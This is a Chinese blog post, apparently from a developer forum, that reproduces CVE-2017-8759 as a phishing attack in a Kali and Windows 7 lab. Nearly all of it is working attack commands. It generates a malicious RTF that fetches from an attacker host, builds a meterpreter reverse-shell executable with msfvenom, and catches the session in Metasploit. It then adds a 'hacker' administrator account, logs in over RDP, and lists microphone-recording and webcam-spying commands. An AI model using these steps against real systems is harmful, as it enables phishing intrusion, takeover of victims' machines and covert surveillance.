CVE-2017-8759复现(word宏钓鱼)

CVE-2017-8759漏洞复现(word宏钓鱼)

0x01 虚拟机kali-linux、win7靶机

  • 1.为了方便起见,直接利用GitHub上的一个POC。

    git clone https://github.com/bhdresh/CVE-2017-8759.git

1

  • 2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件。

    python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.50.132/logo.txt

2

  • 3.利用msfVENOM生成一个反弹shell的exe文件,命名为shell.exe。

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.132 LPORT=4444 -f exe > /root/shell.exe

3

4

  • 5.开启metasploit的监听模块进行监听,设置响应载荷以及监听IP。

5

  • 6.将恶意rtf文件发送到win7靶机上。当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,即可获取靶机控制权。

6

7

0x02 对win7靶机实现控制

  • 1.新建账号并加入管理组

8

  • 2.利用远程桌面客户端连接靶机的远程桌面服务

    rdesktop -u hacker -p 123456 192.168.50.134(此处为靶机IP)

9

10

0x03 其他的一些骚操作

  • sysinfo 获取系统信息

  • getsystem 获取高权限

  • reg 修改注册表

  • record_mic 音频录制

  • webcam_stream 摄像头视频获取

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值